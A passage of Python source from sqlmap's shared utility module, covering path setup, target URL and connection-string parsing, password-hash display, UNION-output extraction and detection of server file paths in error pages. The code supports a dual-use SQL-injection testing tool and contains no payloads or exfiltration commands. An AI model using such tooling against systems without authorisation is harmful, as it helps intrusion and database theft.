checkPipedInput()\n    else:\n        try:\n            if filename is None or not os.path.isfile(filename):\n                valid = False\n        except:\n            valid = False\n\n        if valid:\n            try:\n                with open(filename, \"rb\"):\n                    pass\n            except:\n                valid = False\n\n    if not valid and raiseOnError:\n        raise SqlmapSystemException(\"unable to read file '%s'\" % filename)\n\n    return valid\n\ndef banner():\n    \"\"\"\n    This function prints sqlmap banner with its version\n    \"\"\"\n\n    if not any(_ in sys.argv for _ in (\"--version\", \"--api\")) and not conf.get(\"disableBanner\"):\n        result = BANNER\n\n        if not IS_TTY or any(_ in sys.argv for _ in (\"--disable-coloring\", \"--disable-colouring\")):\n            result = clearColors(result)\n        elif IS_WIN:\n            coloramainit()\n\n        dataToStdout(result, forceOutput=True)\n\ndef parseJson(content):\n    \"\"\"\n    This function parses POST_HINT.JSON and POST_HINT.JSON_LIKE content\n\n    >>> parseJson(\"{'id':1}\")[\"id\"] == 1\n    True\n    >>> parseJson('{\"id\":1}')[\"id\"] == 1\n    True\n    \"\"\"\n\n    quote = None\n    retVal = None\n\n    for regex in (r\"'[^']+'\\s*:\", r'\"[^\"]+\"\\s*:'):\n        match = re.search(regex, content)\n        if match:\n            quote = match.group(0)[0]\n\n    try:\n        if quote == '\"':\n            retVal = json.loads(content)\n        elif quote == \"'\":\n            content = content.replace('\"', '\\\\\"')\n            content = content.replace(\"\\\\'\", BOUNDARY_BACKSLASH_MARKER)\n            content = content.replace(\"'\", '\"')\n            content = content.replace(BOUNDARY_BACKSLASH_MARKER, \"'\")\n            retVal = json.loads(content)\n    except:\n        pass\n\n    return retVal\n\ndef parsePasswordHash(password):\n    \"\"\"\n    In case of Microsoft SQL Server password hash value is expanded to its components\n\n    >>> pushValue(kb.forcedDbms)\n    >>> kb.forcedDbms = DBMS.MSSQL\n    >>> \"salt: 4086ceb6\" in parsePasswordHash(\"0x01004086ceb60c90646a8ab9889fe3ed8e5c150b5460ece8425a\")\n    True\n    >>> kb.forcedDbms = popValue()\n    \"\"\"\n\n    blank = ' ' * 8\n\n    if isNoneValue(password) or password == ' ':\n        retVal = NULL\n    else:\n        retVal = password\n\n    if Backend.isDbms(DBMS.MSSQL) and retVal != NULL and isHexEncodedString(password):\n        retVal = \"%s\\n\" % password\n        retVal += \"%sheader: %s\\n\" % (blank, password[:6])\n        retVal += \"%ssalt: %s\\n\" % (blank, password[6:14])\n        retVal += \"%smixedcase: %s\\n\" % (blank, password[14:54])\n\n        if password[54:]:\n            retVal += \"%suppercase: %s\" % (blank, password[54:])\n\n    return retVal\n\ndef cleanQuery(query):\n    \"\"\"\n    Switch all SQL statement (alike) keywords to upper case\n\n    >>> cleanQuery(\"select id from users\")\n    'SELECT id FROM users'\n    \"\"\"\n\n    retVal = query\n\n    for sqlStatements in SQL_STATEMENTS.values():\n        for sqlStatement in sqlStatements:\n            candidate = sqlStatement.replace(\"(\", \"\").replace(\")\", \"\").strip()\n            queryMatch = re.search(r\"(?i)\\b(%s)\\b\" % candidate, query)\n\n            if queryMatch and \"sys_exec\" not in query:\n                retVal = retVal.replace(queryMatch.group(1), candidate.upper())\n\n    return retVal\n\ndef cleanReplaceUnicode(value):\n    \"\"\"\n    Cleans unicode for proper encode/decode\n\n    >>> cleanReplaceUnicode(['a', 'b'])\n    ['a', 'b']\n    \"\"\"\n\n    def clean(value):\n        return value.encode(UNICODE_ENCODING, errors=\"replace\").decode(UNICODE_ENCODING) if isinstance(value, six.text_type) else value\n\n    return applyFunctionRecursively(value, clean)\n\ndef setPaths(rootPath):\n    \"\"\"\n    Sets absolute paths for project directories and files\n    \"\"\"\n\n    paths.SQLMAP_ROOT_PATH = rootPath\n\n    # sqlmap paths\n    paths.SQLMAP_DATA_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, \"data\")\n    paths.SQLMAP_EXTRAS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, \"extra\")\n    paths.SQLMAP_SETTINGS_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, \"lib\", \"core\", \"settings.py\")\n    paths.SQLMAP_TAMPER_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, \"tamper\")\n\n    paths.SQLMAP_PROCS_PATH = os.path.join(paths.SQLMAP_DATA_PATH, \"procs\")\n    paths.SQLMAP_SHELL_PATH = os.path.join(paths.SQLMAP_DATA_PATH, \"shell\")\n    paths.SQLMAP_TXT_PATH = os.path.join(paths.SQLMAP_DATA_PATH, \"txt\")\n    paths.SQLMAP_UDF_PATH = os.path.join(paths.SQLMAP_DATA_PATH, \"udf\")\n    paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_DATA_PATH, \"xml\")\n    paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, \"banner\")\n    paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, \"payloads\")\n\n    # sqlmap files\n    paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, \"common-columns.txt\")\n    paths.COMMON_FILES = os.path.join(paths.SQLMAP_TXT_PATH, \"common-files.txt\")\n    paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, \"common-tables.txt\")\n    paths.COMMON_OUTPUTS = os.path.join(paths.SQLMAP_TXT_PATH, 'common-outputs.txt')\n    paths.SQL_KEYWORDS = os.path.join(paths.SQLMAP_TXT_PATH, \"keywords.txt\")\n    paths.SMALL_DICT = os.path.join(paths.SQLMAP_TXT_PATH, \"smalldict.txt\")\n    paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, \"user-agents.txt\")\n    paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, \"wordlist.tx_\")\n    paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, \"errors.xml\")\n    paths.BOUNDARIES_XML = os.path.join(paths.SQLMAP_XML_PATH, \"boundaries.xml\")\n    paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, \"queries.xml\")\n    paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, \"generic.xml\")\n    paths.MSSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, \"mssql.xml\")\n    paths.MYSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, \"mysql.xml\")\n    paths.ORACLE_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, \"oracle.xml\")\n    paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, \"postgresql.xml\")\n\n    for path in paths.values():\n        if any(path.endswith(_) for _ in (\".txt\", \".xml\", \".tx_\")):\n            checkFile(path)\n\n    if IS_WIN:\n        # Reference: https://pureinfotech.com/list-environment-variables-windows-10/\n        if os.getenv(\"LOCALAPPDATA\"):\n            paths.SQLMAP_HOME_PATH = os.path.expandvars(\"%LOCALAPPDATA%\\\\sqlmap\")\n        elif os.getenv(\"USERPROFILE\"):\n            paths.SQLMAP_HOME_PATH = os.path.expandvars(\"%USERPROFILE%\\\\Local Settings\\\\sqlmap\")\n        else:\n            paths.SQLMAP_HOME_PATH = os.path.join(os.path.expandvars(os.path.expanduser(\"~\")), \"sqlmap\")\n    else:\n        paths.SQLMAP_HOME_PATH = os.path.join(os.path.expandvars(os.path.expanduser(\"~\")), \".sqlmap\")\n\n        if not os.path.isdir(paths.SQLMAP_HOME_PATH):\n            if \"XDG_DATA_HOME\" in os.environ:\n                paths.SQLMAP_HOME_PATH = os.path.join(os.environ[\"XDG_DATA_HOME\"], \"sqlmap\")\n            else:\n                paths.SQLMAP_HOME_PATH = os.path.join(os.path.expandvars(os.path.expanduser(\"~\")), \".local\", \"share\", \"sqlmap\")\n\n    paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get(\"SQLMAP_OUTPUT_PATH\", os.path.join(paths.SQLMAP_HOME_PATH, \"output\")), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)\n    paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"%s\", \"dump\")\n    paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"%s\", \"files\")\n\n    # History files\n    paths.SQLMAP_HISTORY_PATH = getUnicode(os.path.join(paths.SQLMAP_HOME_PATH, \"history\"), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)\n    paths.API_SHELL_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, \"api.hst\")\n    paths.OS_SHELL_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, \"os.hst\")\n    paths.SQL_SHELL_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, \"sql.hst\")\n    paths.SQLMAP_SHELL_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, \"sqlmap.hst\")\n    paths.GITHUB_HISTORY = os.path.join(paths.SQLMAP_HISTORY_PATH, \"github.hst\")\n\ndef weAreFrozen():\n    \"\"\"\n    Returns whether we are frozen via py2exe.\n    This will affect how we find out where we are located.\n\n    # Reference: http://www.py2exe.org/index.cgi/WhereAmI\n    \"\"\"\n\n    return hasattr(sys, \"frozen\")\n\ndef parseTargetDirect():\n    \"\"\"\n    Parse target dbms and set some attributes into the configuration singleton\n\n    >>> pushValue(conf.direct)\n    >>> conf.direct = \"mysql://root:testpass@127.0.0.1:3306/testdb\"\n    >>> parseTargetDirect()\n    >>> conf.dbmsDb\n    'testdb'\n    >>> conf.dbmsPass\n    'testpass'\n    >>> conf.direct = \"mysql://user:'P@ssw0rd'@127.0.0.1:3306/test\"\n    >>> parseTargetDirect()\n    >>> conf.dbmsPass\n    'P@ssw0rd'\n    >>> conf.hostname\n    '127.0.0.1'\n    >>> conf.direct = popValue()\n    \"\"\"\n\n    if not conf.direct:\n        return\n\n    details = None\n    remote = False\n\n    for dbms in SUPPORTED_DBMS:\n        details = re.search(r\"^(?P<dbms>%s)://(?P<credentials>(?P<user>.*?)\\:(?P<pass>.*)\\@)?(?P<remote>(?P<hostname>[\\w.-]+?)\\:(?P<port>[\\d]+)\\/)?(?P<db>[\\w\\d\\ \\:\\.\\_~\\-\\/\\\\]*)$\" % dbms, conf.direct, re.I)\n\n        if details:\n            conf.dbms = details.group(\"dbms\")\n\n            if details.group(\"credentials\"):\n                conf.dbmsUser = details.group(\"user\").strip(\"'\\\"\")\n                conf.dbmsPass = details.group(\"pass\").strip(\"'\\\"\")\n            else:\n                if conf.dbmsCred:\n                    conf.dbmsUser, conf.dbmsPass = conf.dbmsCred.split(':')\n                else:\n                    conf.dbmsUser = \"\"\n                    conf.dbmsPass = \"\"\n\n            if not conf.dbmsPass:\n                conf.dbmsPass = None\n\n            if details.group(\"remote\"):\n                remote = True\n                conf.hostname = details.group(\"hostname\").strip()\n                conf.port = int(details.group(\"port\"))\n            else:\n                conf.hostname = \"localhost\"\n                conf.port = 0\n\n            conf.dbmsDb = details.group(\"db\").strip() if details.group(\"db\") is not None else None\n            conf.parameters[None] = \"direct connection\"\n\n            break\n\n    if kb.smokeMode:\n        return\n\n    if not details:\n        errMsg = \"invalid target details, valid syntax is for instance \"\n        errMsg += \"'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' \"\n        errMsg += \"or 'access://DATABASE_FILEPATH'\"\n        raise SqlmapSyntaxException(errMsg)\n\n    for dbmsName, data in DBMS_DICT.items():\n        if dbmsName == conf.dbms or conf.dbms.lower() in data[0]:\n            try:\n                conf.dbms = dbmsName\n\n                if dbmsName in (DBMS.ACCESS, DBMS.SQLITE, DBMS.FIREBIRD):\n                    if remote:\n                        warnMsg = \"direct connection over the network for \"\n                        warnMsg += \"%s DBMS is not supported\" % dbmsName\n                        logger.warning(warnMsg)\n\n                        conf.hostname = \"localhost\"\n                        conf.port = 0\n                elif not remote:\n                    errMsg = \"missing remote connection details (e.g. \"\n                    errMsg += \"'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' \"\n                    errMsg += \"or 'access://DATABASE_FILEPATH')\"\n                    raise SqlmapSyntaxException(errMsg)\n\n                if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):\n                    __import__(\"_mssql\")\n                    pymssql = __import__(\"pymssql\")\n\n                    if not hasattr(pymssql, \"__version__\") or pymssql.__version__ < \"1.0.2\":\n                        errMsg = \"'%s' third-party library must be \" % data[1]\n                        errMsg += \"version >= 1.0.2 to work properly. \"\n                        errMsg += \"Download from '%s'\" % data[2]\n                        raise SqlmapMissingDependence(errMsg)\n\n                elif dbmsName == DBMS.MYSQL:\n                    __import__(\"pymysql\")\n                elif dbmsName == DBMS.PGSQL:\n                    __import__(\"psycopg2\")\n                elif dbmsName == DBMS.ORACLE:\n                    __import__(\"cx_Oracle\")\n\n                    # Reference: http://itsiti.com/ora-28009-connection-sys-sysdba-sysoper\n                    if (conf.dbmsUser or \"\").upper() == \"SYS\":\n                        conf.direct = \"%s?mode=SYSDBA\" % conf.direct\n                elif dbmsName == DBMS.SQLITE:\n                    __import__(\"sqlite3\")\n                elif dbmsName == DBMS.ACCESS:\n                    __import__(\"pyodbc\")\n                elif dbmsName == DBMS.FIREBIRD:\n                    __import__(\"kinterbasdb\")\n            except (SqlmapSyntaxException, SqlmapMissingDependence):\n                raise\n            except:\n                if _sqlalchemy and data[3] and any(_ in _sqlalchemy.dialects.__all__ for _ in (data[3], data[3].split('+')[0])):\n                    pass\n                else:\n                    errMsg = \"sqlmap requires '%s' third-party library \" % data[1]\n                    errMsg += \"in order to directly connect to the DBMS \"\n                    errMsg += \"'%s'. You can download it from '%s'\" % (dbmsName, data[2])\n                    errMsg += \". Alternative is to use a package 'python-sqlalchemy' \"\n                    errMsg += \"with support for dialect '%s' installed\" % data[3]\n                    raise SqlmapMissingDependence(errMsg)\n\ndef parseTargetUrl():\n    \"\"\"\n    Parse target URL and set some attributes into the configuration singleton\n\n    >>> pushValue(conf.url)\n    >>> conf.url = \"https://www.test.com/?id=1\"\n    >>> parseTargetUrl()\n    >>> conf.hostname\n    'www.test.com'\n    >>> conf.scheme\n    'https'\n    >>> conf.url = popValue()\n    \"\"\"\n\n    if not conf.url:\n        return\n\n    originalUrl = conf.url\n\n    if re.search(r\"://\\[.+\\]\", conf.url) and not socket.has_ipv6:\n        errMsg = \"IPv6 communication is not supported \"\n        errMsg += \"on this platform\"\n        raise SqlmapGenericException(errMsg)\n\n    if not re.search(r\"^(http|ws)s?://\", conf.url, re.I):\n        if re.search(r\":443\\b\", conf.url):\n            conf.url = \"https://%s\" % conf.url\n        else:\n            conf.url = \"http://%s\" % conf.url\n\n    if kb.customInjectionMark in conf.url:\n        conf.url = conf.url.replace('?', URI_QUESTION_MARKER)\n\n    try:\n        urlSplit = _urllib.parse.urlsplit(conf.url)\n    except ValueError as ex:\n        errMsg = \"invalid URL '%s' has been given ('%s'). \" % (conf.url, getSafeExString(ex))\n        errMsg += \"Please be sure that you don't have any leftover characters (e.g. '[' or ']') \"\n        errMsg += \"in the hostname part\"\n        raise SqlmapGenericException(errMsg)\n\n    hostnamePort = urlSplit.netloc.split(\":\") if not re.search(r\"\\[.+\\]\", urlSplit.netloc) else filterNone((re.search(r\"\\[.+\\]\", urlSplit.netloc).group(0), re.search(r\"\\](:(?P<port>\\d+))?\", urlSplit.netloc).group(\"port\")))\n\n    conf.scheme = (urlSplit.scheme.strip().lower() or \"http\")\n    conf.path = urlSplit.path.strip()\n    conf.hostname = hostnamePort[0].strip()\n\n    if conf.forceSSL:\n        conf.scheme = re.sub(r\"(?i)\\A(http|ws)\\Z\", r\"\\g<1>s\", conf.scheme)\n\n    conf.ipv6 = conf.hostname != conf.hostname.strip(\"[]\")\n    conf.hostname = conf.hostname.strip(\"[]\").replace(kb.customInjectionMark, \"\")\n\n    try:\n        conf.hostname.encode(\"idna\")\n        conf.hostname.encode(UNICODE_ENCODING)\n    except (LookupError, UnicodeError):\n        invalid = True\n    else:\n        invalid = False\n\n    if any((invalid, re.search(r\"\\s\", conf.hostname), '..' in conf.hostname, conf.hostname.startswith('.'), '\\n' in originalUrl)):\n        errMsg = \"invalid target URL ('%s')\" % originalUrl\n        raise SqlmapSyntaxException(errMsg)\n\n    if len(hostnamePort) == 2:\n        try:\n            conf.port = int(hostnamePort[1])\n        except:\n            errMsg = \"invalid target URL\"\n            raise SqlmapSyntaxException(errMsg)\n    elif conf.scheme in (\"https\", \"wss\"):\n        conf.port = 443\n    else:\n        conf.port = 80\n\n    if conf.port < 1 or conf.port > 65535:\n        errMsg = \"invalid target URL port (%d)\" % conf.port\n        raise SqlmapSyntaxException(errMsg)\n\n    conf.url = getUnicode(\"%s://%s:%d%s\" % (conf.scheme, (\"[%s]\" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))\n    conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')\n\n    if urlSplit.query:\n        if '=' not in urlSplit.query:\n            conf.url = \"%s?%s\" % (conf.url, getUnicode(urlSplit.query))\n        else:\n            conf.parameters[PLACE.GET] = urldecode(urlSplit.query, spaceplus=not conf.base64Parameter) if urlSplit.query and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in urlSplit.query else urlSplit.query\n\n    if (intersect(REFERER_ALIASES, conf.testParameter, True) or conf.level >= 3) and not any(_[0].upper() == HTTP_HEADER.REFERER.upper() for _ in conf.httpHeaders):\n        debugMsg = \"setting the HTTP Referer header to the target URL\"\n        logger.debug(debugMsg)\n        conf.httpHeaders = [_ for _ in conf.httpHeaders if _[0] != HTTP_HEADER.REFERER]\n        conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(kb.customInjectionMark, \"\")))\n\n    if (intersect(HOST_ALIASES, conf.testParameter, True) or conf.level >= 5) and not any(_[0].upper() == HTTP_HEADER.HOST.upper() for _ in conf.httpHeaders):\n        debugMsg = \"setting the HTTP Host header to the target URL\"\n        logger.debug(debugMsg)\n        conf.httpHeaders = [_ for _ in conf.httpHeaders if _[0] != HTTP_HEADER.HOST]\n        conf.httpHeaders.append((HTTP_HEADER.HOST, getHostHeader(conf.url)))\n\n    if conf.url != originalUrl:\n        kb.originalUrls[conf.url] = originalUrl\n\ndef escapeJsonValue(value):\n    \"\"\"\n    Escapes JSON value (used in payloads)\n\n    # Reference: https://stackoverflow.com/a/16652683\n\n    >>> \"\\\\n\" in escapeJsonValue(\"foo\\\\nbar\")\n    False\n    >>> \"\\\\\\\\t\" in escapeJsonValue(\"foo\\\\tbar\")\n    True\n    \"\"\"\n\n    retVal = \"\"\n\n    for char in value:\n        if char < ' ' or char == '\"':\n            retVal += json.dumps(char)[1:-1]\n        else:\n            retVal += char\n\n    return retVal\n\ndef expandAsteriskForColumns(expression):\n    \"\"\"\n    If the user provided an asterisk rather than the column(s)\n    name, sqlmap will retrieve the columns itself and reprocess\n    the SQL query string (expression)\n    \"\"\"\n\n    match = re.search(r\"(?i)\\ASELECT(\\s+TOP\\s+[\\d]+)?\\s+\\*\\s+FROM\\s+((`[^`]+`|[^\\s]+)+)\", expression)\n\n    if match:\n        infoMsg = \"you did not provide the fields in your query. \"\n        infoMsg += \"sqlmap will retrieve the column names itself\"\n        logger.info(infoMsg)\n\n        _ = match.group(2).replace(\"..\", '.').replace(\".dbo.\", '.')\n        db, conf.tbl = _.split('.', 1) if '.' in _ else (None, _)\n\n        if db is None:\n            if expression != conf.sqlQuery:\n                conf.db = db\n            elif conf.db:\n                expression = re.sub(r\"([^\\w])%s\" % re.escape(conf.tbl), r\"\\g<1>%s.%s\" % (conf.db, conf.tbl), expression)\n        else:\n            conf.db = db\n\n        conf.db = safeSQLIdentificatorNaming(conf.db)\n        conf.tbl = safeSQLIdentificatorNaming(conf.tbl, True)\n\n        columnsDict = conf.dbmsHandler.getColumns(onlyColNames=True)\n\n        if columnsDict and conf.db in columnsDict and conf.tbl in columnsDict[conf.db]:\n            columns = list(columnsDict[conf.db][conf.tbl].keys())\n            columns.sort()\n            columnsStr = \", \".join(column for column in columns)\n            expression = expression.replace('*', columnsStr, 1)\n\n            infoMsg = \"the query with expanded column name(s) is: \"\n            infoMsg += \"%s\" % expression\n            logger.info(infoMsg)\n\n    return expression\n\ndef getLimitRange(count, plusOne=False):\n    \"\"\"\n    Returns range of values used in limit/offset constructs\n\n    >>> [_ for _ in getLimitRange(10)]\n    [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n    \"\"\"\n\n    retVal = None\n    count = int(count)\n    limitStart, limitStop = 1, count\n    reverse = False\n\n    if kb.dumpTable:\n        if conf.limitStart and conf.limitStop and conf.limitStart > conf.limitStop:\n            limitStop = conf.limitStart\n            limitStart = conf.limitStop\n            reverse = True\n        else:\n            if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop:\n                limitStop = conf.limitStop\n\n            if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:\n                limitStart = conf.limitStart\n\n    retVal = xrange(limitStart, limitStop + 1) if plusOne else xrange(limitStart - 1, limitStop)\n\n    if reverse:\n        retVal = xrange(retVal[-1], retVal[0] - 1, -1)\n\n    return retVal\n\ndef parseUnionPage(page):\n    \"\"\"\n    Returns resulting items from UNION query inside provided page content\n\n    >>> parseUnionPage(\"%sfoo%s%sbar%s\" % (kb.chars.start, kb.chars.stop, kb.chars.start, kb.chars.stop))\n    ['foo', 'bar']\n    \"\"\"\n\n    if page is None:\n        return None\n\n    if re.search(r\"(?si)\\A%s.*%s\\Z\" % (kb.chars.start, kb.chars.stop), page):\n        if len(page) > LARGE_OUTPUT_THRESHOLD:\n            warnMsg = \"large output detected. This might take a while\"\n            logger.warning(warnMsg)\n\n        data = BigArray()\n        keys = set()\n\n        for match in re.finditer(r\"%s(.*?)%s\" % (kb.chars.start, kb.chars.stop), page, re.DOTALL | re.IGNORECASE):\n            entry = match.group(1)\n\n            if kb.chars.start in entry:\n                entry = entry.split(kb.chars.start)[-1]\n\n            if kb.unionDuplicates:\n                key = entry.lower()\n                if key not in keys:\n                    keys.add(key)\n                else:\n                    continue\n\n            entry = entry.split(kb.chars.delimiter)\n\n            if conf.hexConvert:\n                entry = applyFunctionRecursively(entry, decodeDbmsHexValue)\n\n            if kb.safeCharEncode:\n                entry = applyFunctionRecursively(entry, safecharencode)\n\n            data.append(entry[0] if len(entry) == 1 else entry)\n    else:\n        data = page\n\n    if len(data) == 1 and isinstance(data[0], six.string_types):\n        data = data[0]\n\n    return data\n\ndef parseFilePaths(page):\n    \"\"\"\n    Detects (possible) absolute system paths inside the provided page content\n\n    >>> _ = \"/var/www/html/index.php\"; parseFilePaths(\"<html>Error occurred at line 207 of: %s<br>Please contact your administrator</html>\" % _); _ in kb.absFilePaths\n    True\n    \"\"\"\n\n    if page:\n        for regex in FILE_PATH_REGEXES:\n            for match in re.finditer(regex, page):\n                absFilePath = match.group(\"result\").strip()\n                page = page.replace(absFilePath, \"\")\n\n                if isWindowsDriveLetterPath(absFilePath):\n                    absFilePath = posixToNtSlashes(absFilePath)\n\n                if absFilePath not in kb.absFilePaths:\n                    kb.absFilePaths.add(absFilePath)\n\ndef getLocalIP():\n    \"\"\"\n    Get local IP address (exposed to the remote/target)\n    \"\"\"\n\n    retVal = None\n\n    try:\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.connect((conf.hostname, conf.port))\n        retVal, _ = s.getsockname()\n        s.close()\n    except:\n        debugMsg = \"there was an error in opening socket \"\n        debugMsg += \"connection toward '%s'\" % conf.hostname\n        logger.debug(debugMsg)\n\n    return retVal\n\ndef getRemoteIP():\n    \"\"\"\n    Get remote/target IP address\n\n    >>> pushValue(conf.hostname)\n    >>> conf.hostname = \"localhost\"\n    >>> getRemoteIP() == \"127.0.0.1\"\n    True\n    >>> conf.hostname = popValue()\n    \"\"\"\n\n    retVal = None\n\n    try:\n        retVal = socket.gethostbyname(conf.hostname)\n    except socket.gaierror:\n        errMsg = \"address resolution problem \"\n        errMsg += \"occurred for hostname '%s'\" % conf.hostname\n        singleTimeLogMessage(errMsg, logging.ERROR)\n\n    return retVal\n\ndef getFileType(filePath):\n    \"\"\"\n    Returns \"magic\" file type for given file path\n\n    >>> getFileType(__file__)\n    'text'\n    >>> getFileType(sys.executable)\n    'binary'\n    \"\"\"\n\n    try:\n        desc = magic.from_file(filePath) or magic.MAGIC_UNKNOWN_FILETYPE\n    except:\n        desc = magic.MAGIC_UNKNOWN_FILETYPE\n    finally:\n        desc = getText(desc)\n\n    if desc == getText(magic.MAGIC_UNKNOWN_FILETYPE):\n        content = openFile(filePath, \"rb\", encoding=None).read()\n\n        try:\n            content.decode()\n        except:\n            pass\n        else:\n            desc = \"ascii\"\n\n    return \"text\" if any(_ in desc.lower() for _ in (\"ascii\", \"text\")) else \"binary\"\n\ndef getCharset(charsetType=None):\n    \"\"\"\n    Returns list with integers representing characters of a given\n    charset type appropriate for inference techniques\n\n    >>> getCharset(CHARSET_TYPE.BINARY)\n    [0, 1, 47, 48, 49]\n    \"\"\"\n\n    asciiTbl = []\n\n    if charsetType is None:\n        asciiTbl.extend(xrange(0, 128))\n\n    # Binary\n    elif charsetType == CHARSET_TYPE.BINARY:\n        asciiTbl.extend((0, 1))\n        asciiTbl.extend(xrange(47, 50))\n\n    # Digits\n    elif charsetType == CHARSET_TYPE.DIGITS:\n        asciiTbl.extend((0, 9))\n        asciiTbl.extend(xrange(47, 58))\n\n    # Hexadecimal\n    elif charsetType == CHARSET_TYPE.HEXADECIMAL:\n        asciiTbl.extend((0, 1))\n        asciiTbl.extend(xrange(47, 58))\n        asciiTbl.extend(xrange(64, 71))\n        asciiTbl.extend((87, 88))  # X\n        asciiTbl.extend(xrange(96, 103))\n        asciiTbl.extend((119, 120))  # x\n\n    # Characters\n    elif charsetType == CHARSET_TYPE.ALPHA:\n        asciiTbl.extend((0, 1))\n        asciiTbl.extend(xrange(64, 91))\n        asciiTbl.extend(xrange(96, 123))\n\n    # Characters and digits\n    elif charsetType == CHARSET_TYPE.ALPHANUM:\n        asciiTbl.extend((0, 1))\n        asciiTbl.extend(xrange(47, 58))\n        asciiTbl.extend(xrange(64, 91))\n        asciiTbl.extend(xrange(96, 123))\n\n    return asciiTbl\n\ndef directoryPath(filepath):\n    \"\"\"\n    Returns directory path for a given filepath\n\n    >>> directoryPath('/var/log/apache.log')\n    '/var/log'\n    >>> directoryPath('/var/log')\n    '/var/log'\n    \"\"\"\n\n    retVal = filepath\n\n    if filepath and os.path.splitext(filepath)[-1]:\n        retVal = ntpath.dirname(filepath) if isWindowsDriveLetterPath(filepath) else posixpath.dirname(filepath)\n\n    return retVal\n\ndef normalizePath(filepath):\n    \"\"\"\n    Returns normalized string representation of a given filepath\n\n    >>> normalizePath('//var///log/apache.log')\n    '/var/log/apache.log'\n    \"\"\"\n\n    retVal = filepath\n\n    if retVal:\n        retVal = retVal.strip(\"\\r\\n\")\n        retVal = ntpath.normpath(retVal) if isWindowsDriveLetterPath(retVal) else re.sub(r\"\\A/{2,}\", \"/\", posixpath.normpath(retVal))\n\n    return retVal\n\ndef safeFilepathEncode(filepath):\n    \"\"\"\n    Returns filepath in (ASCII) format acceptable for OS handling (e.g. reading)\n\n    >>> 'sqlmap' in safeFilepathEncode(paths.SQLMAP_HOME_PATH)\n    True\n    \"\"\"\n\n    retVal = filepath\n\n    if filepath and six.PY2 and isinstance(filepath, six.text_type):\n        retVal = getBytes(filepath, sys.getfilesystemencoding() or UNICODE_ENCODING)\n\n    return retVal\n\n\ndef safeExpandUser(filepath):\n    \"\"\"\n    Patch for a Python Issue18171 (http://bugs.python.org/issue18171)\n\n    >>> os.path.basename(__file__) in safeExpandUser(__file__)\n    True\n    \"\"\"\n\n    retVal = filepath\n\n    try:\n        retVal = os.path.expanduser(filepath)\n    except UnicodeError:\n        _ = locale.getdefaultlocale()\n        encoding = _[1] if _ and len(_) > 1 else UNICODE_ENCODING\n        retVal = getUnicode(os.path.expanduser(filepath.encode(encoding)), encoding=encoding)\n\n    return retVal\n\ndef safeStringFormat(format_, params):\n    \"\"\"\n    Avoids problems with inappropriate string format strings\n\n    >>> safeStringFormat('SELECT foo FROM %s LIMIT %d', ('bar', '1'))\n    'SELECT foo FROM bar LIMIT 1'\n    >>> safeStringFormat(\"SELECT foo FROM %s WHERE name LIKE '%susan%' LIMIT %d\", ('bar', '1'))\n    \"SELECT foo FROM bar WHERE name LIKE '%susan%' LIMIT 1\"\n    \"\"\"\n\n    if format_.count(PAYLOAD_DELIMITER) == 2:\n        _ = format_.split(PAYLOAD_DELIMITER)\n        _[1] = re.sub(r\"(\\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\\Z)\", r\"\\g<1>%s\\g<3>\", _[1])\n        retVal = PAYLOAD_DELIMITER.join(_)\n    else:\n        retVal = re.sub(r\"(\\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\\Z)\", r\"\\g<1>%s\\g<3>\", format_)\n\n    if isinstance(params, six.string_types):\n        retVal = retVal.replace(\"%s\", params, 1)\n    elif not isListLike(params):\n        retVal = retVal.replace(\"%s\", getUnicode(params), 1)\n    else:\n        start, end = 0, len(retVal)\n        match = re.search(r\"%s(.+)%s\" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), retVal)\n        if match and PAYLOAD_DELIMITER not in match.group(1):\n            start, end = match.start(), match.end()\n        if retVal.count(\"%s\", start, end) == len(params):\n            for param in params:\n                index = retVal.find(\"%s\", start)\n                if isinstance(param, six.string_types):\n                    param = param.replace('%', PARAMETER_PERCENTAGE_MARKER)\n                retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:]\n        else:\n            if any('%s' in _ for _ in conf.parameters.values()):\n                parts = format_.split(' ')\n                for i in xrange(len(parts)):\n                    if PAYLOAD_DELIMITER in 